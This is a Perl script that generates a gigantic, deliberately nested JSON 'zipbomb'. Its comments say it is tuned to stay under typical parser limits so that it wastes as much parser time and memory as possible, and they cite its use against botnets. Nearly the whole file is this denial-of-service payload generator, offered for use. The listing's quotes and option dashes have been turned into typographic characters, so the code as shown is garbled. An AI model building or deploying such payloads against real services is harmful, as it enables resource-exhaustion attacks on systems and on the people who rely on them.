#!/usr/bin/perl -w
# Copyright © 2026 Jamie Zawinski <jwz@jwz.org>
#
# Permission to use, copy, modify, distribute, and sell this software and its
# documentation for any purpose is hereby granted without fee, provided that
# the above copyright notice appear in all copies and that both that
# copyright notice and this permission notice appear in supporting
# documentation. No representations are made about the suitability of this
# software for any purpose. It is provided “as is” without express or
# implied warranty.
#
# Creates an absolutely enormous, but syntactically correct, JSON file,
# suitable for use as a zipbomb.
#
# It attempts to stay below various length and depth limitations, with my
# best guesses as to what typical parsers’ limits are; the goal here being
# to consume as much of the parser’s time and memory as possible before it
# has an excuse to give up early.
#
# With a 10GB file, ‘jq’ parses the entire file and produces no error
# messages, but also no output, and takes nearly 60 seconds to do so
# (Mac Studio M1 Ultra, 2026).
#
# “jsonbomb.pl –max-size 10GB | gzip –best” yields a 705MB file.
# With –no-permute-strings, it is a more reasonable 61MB.
#
# See https://www.jwz.org/blog/2026/01/zipbomb-json/
# and https://www.jwz.org/blog/2024/02/harassing-botnets-with-zipbombs/
#
# Created: 1-Feb-2026.
require 5;
use diagnostics;
use strict;
no warnings “recursion”;
my $progname = $0; $progname =~ s@.*/@@g;
my ($version) = (‘$Revision: 1.05 $’ =~ m/\s(\d[.\d]+)\s/s);
my $verbose = 1;
my $permute_strings_p = 1;
my $max_string_length = 1024;
my $max_object_keys = 1024;
my $max_object_depth = 1024;
my $max_object_key_length = 250;
my $max_array_length = 1024;
my $max_array_depth = 1024;
my $max_output_bytes = 1024 * 1024;
my $base_text = ‘All work and no play makes Jack a dull boy.’;
sub parse_bytes($$) {
my ($arg, $s) = @_;
usage (“unparsable size: $arg”) unless defined($s);
if ($s =~ s@^(\d[.\d]*)\s*KB?$@@si) { return $1 * 1024; }
elsif ($s =~ s@^(\d[.\d]*)\s*MB?$@@si) { return $1 * 1024*1024; }
elsif ($s =~ s@^(\d[.\d]*)\s*GB?$@@si) { return $1 * 1024*1024*1024; }
elsif ($s =~ m/^(\d[.\d]*)$/s) { return $1 + 0; }
# usage (“unparsable size: $arg $s”);
return undef;
}
sub size_str($) {
my ($size) = @_;
if (!defined($size)) {
return ‘0 bytes’;
} elsif ($size > 2*1024*1024*1024) {
return sprintf(“%.0f GB”, $size / (1024*1024*1024));
} elsif ($size > 1024*1024) {
return sprintf(“%.0f MB”, $size / (1024*1024));
} elsif ($size > 1024) {
return sprintf(“%d KB”, $size / 1024);
} else {
return “$size bytes”;
}
}
my $last_status_time = undef;
sub status($) {
my ($bytes) = @_;
return unless $verbose;
my $t = time();
$last_status_time = $t unless defined($last_status_time);
if ($t > $last_status_time + 10) {
my $pct = 100 * $bytes / $max_output_bytes;
print STDERR “$progname: ” .
sprintf(“%s (%.0f%%) of %s\n”,
size_str($bytes), $pct, size_str($max_output_bytes));
$last_status_time = $t;
}
}
# Permute the strings in case the parser interns them for efficiency.
sub scrmable($) {
my ($line) = @_;
my @words;
foreach my $word (split (/\s+/, $line)) {
my @w = split (//, $word);
my $A = shift (@w);
my $Z = pop (@w);
if (defined($Z) && rand() > 0.8) {
my $i = scalar (@w);
while ($i– > 0) {
my $j = int (rand() * $i);
my $s = $w[$i];
$w[$i] = $w[$j];
$w[$j] = $s;
$i = 0;
}
$word = $A . join (”, @w) . $Z;
}
$word = uc($word) if (rand() > 0.9);
push @words, $word;
}
return join (‘ ‘, @words);
}
sub make_string($) {
my ($max_length) = @_;
my $L = length($base_text);
my $L2 = 0;
my @s = ();
while ($L2 + $L < $max_length) {
push @s, $base_text;
$L2 += $L + 1;
}
if (!@s) {
my $start = ($permute_strings_p
? int ($L * rand() * 0.3)
: 0);
my $L3 = $L – $start;
$L3 = $max_length if ($L3 > $max_length);
$L3 = ($permute_strings_p
? int ($L3 * (1 – rand() * 0.3))
: $L3);
push @s, substr ($base_text, $start, $L3);
}
my $s = join(‘ ‘, @s);
$s = scrmable ($s) if ($permute_strings_p);
# This can exceed $max_string_length if $base_text has special characters,
# but we don’t want to split at a backslash and cause a syntax error.
$s =~ s/([\\\”\’\n])/\\$1/gs;
return ‘”‘ . $s . ‘”‘;
}
# I’d kind of like to unroll this to use heap instead of stack,
# but it’s sure a lot easiser to think about it recursively.
sub json_emit_thing($$$);
sub json_emit_thing($$$) {
my ($type, $depth, $total_bytes) = @_;
my $this_bytes = 0;
if ($type eq ‘string’) {
my $s = make_string ($max_string_length);
print STDOUT $s;
$this_bytes += length($s);
} elsif ($type eq ‘array’) {
my $n = int ($max_array_length * (1 – (rand() * 0.2)));
my @types = ($depth >= $max_array_depth
? (‘string’)
: (‘string’, ‘string’, ‘string’, ‘string’, ‘object’));
print STDOUT ‘[‘;
$this_bytes++;
for (my $i = 0; $i < $n; $i++) {
if ($i > 0) {
print STDOUT “,\n”;
$this_bytes += 2;
}
my $type2 = $types[int(rand() * @types)];
$this_bytes += json_emit_thing ($type2, $depth + 1,
$total_bytes + $this_bytes);
last if ($total_bytes + $this_bytes > $max_output_bytes);
}
print STDOUT ‘]’;
$this_bytes++;
} elsif ($type eq ‘object’) {
my $n = int ($max_array_length * (1 – (rand() * 0.2)));
my @types = ($depth >= $max_object_depth
? (‘string’)
: (‘string’, ‘string’, ‘string’, ‘string’, ‘object’));
print STDOUT ‘{‘;
$this_bytes++;
# Technically duplicate keys are allowed (last one wins) but some
# parsers consider it an error.
my %dups;
for (my $i = 0; $i < $n; $i++) {
if ($i > 0) {
print STDOUT “,\n”;
$this_bytes += 2;
}
my $s = make_string ($max_object_key_length);
$s =~ s/\s/_/gs;
if ($dups{$s}) {
my $ii = sprintf(“%X”, $i);
$s =~ s/”$/_$ii”/s;
}
$dups{$s} = 1;
print STDOUT $s;
$this_bytes += length($s);
print STDOUT “:”;
$this_bytes++;
my $type2 = $types[int(rand() * @types)];
$this_bytes += json_emit_thing ($type2, $depth + 1,
$total_bytes + $this_bytes);
last if ($total_bytes + $this_bytes > $max_output_bytes);
}
print STDOUT ‘}’;
$this_bytes++;
} else {
error (“unknown type: $type”);
}
status ($total_bytes + $this_bytes);
return $this_bytes;
}
sub jsonbomb() {
# Top level object is always an array.
print STDOUT ‘[‘;
my $bytes = 1;
my $i = 0;
while ($bytes < $max_output_bytes) {
if ($i > 0) {
print STDOUT “,\n”;
$bytes += 2;
}
my @types = (‘array’, ‘object’, ‘string’, ‘string’, ‘string’, ‘string’);
my $type = $types[int(rand() * @types)];
$bytes += json_emit_thing ($type, 0, $bytes);
$i++;
if ($i > $max_array_length) {
# We’ve hit the max length of the top-level array object.
# Increase the limits and keep going, because why not.
print STDERR “$progname: hit max length; increasing limits.\n”
if ($verbose);
$max_array_length *= 2;
$max_object_depth *= 2;
$max_array_depth *= 2;
}
}
print STDOUT “]\n”;
$last_status_time = 0;
status ($bytes);
}
sub error($) {
my ($err) = @_;
print STDERR “$progname: $err\n”;
exit 1;
}
sub usage(;$) {
my ($a) = $_;
print STDERR “$progname: unknown option: $a\n” if defined($a);
print STDERR “usage: $progname [–verbose] [–quiet]” .
” [–max-size ” . sprintf(“%dK”, $max_output_bytes/1024) . “]” .
” [–permute-strings | –no-permute-strings]” .
” [–max-object-keys $max_object_keys]” .
” [–max-object-depth $max_object_depth]” .
” [–max-object-key-length $max_object_key_length]” .
” [–max-array-length $max_array_length]” .
” [–max-array-depth $max_array_depth]” .
” [–max-string-length $max_string_length]” .
” [–base-text STRING]” .
” > OUTFILE.json\n”;
exit 1;
}
sub main() {
while (@ARGV) {
$_ = shift @ARGV;
if (m/^–?verbose$/s) { $verbose++; }
elsif (m/^-v+$/s) { $verbose += length($_)-1; }
elsif (m/^–?quiet$/s) { $verbose = 0; }
elsif (m/^–?max-size$/s) {
$max_output_bytes = parse_bytes ($_, shift @ARGV); }
elsif (m/^–?max-object-keys$/s) {
$max_object_keys = parse_bytes ($_, shift @ARGV); }
elsif (m/^–?max-object-depth$/s) {
$max_object_depth = parse_bytes ($_, shift @ARGV); }
elsif (m/^–?max-object-key-length$/s) {
$max_object_key_length = parse_bytes ($_, shift @ARGV); }
elsif (m/^–?max-array-length$/s) {
$max_array_length = parse_bytes ($_, shift @ARGV); }
elsif (m/^–?max-array-depth$/s) {
$max_array_depth = parse_bytes ($_, shift @ARGV); }
elsif (m/^–?max-string-length$/s) {
$max_string_length = parse_bytes ($_, shift @ARGV); }
elsif (m/^–?base-text$/s) { $base_text = shift @ARGV; }
elsif (m/^–?permute(-strings?)?$/s) { $permute_strings_p = 1; }
elsif (m/^–?no-permute(-strings?)?$/s) { $permute_strings_p = 0; }
elsif (m/^-./s) { usage ($_); }
else { usage ($_); }
}
jsonbomb();
}
main();
exit 0;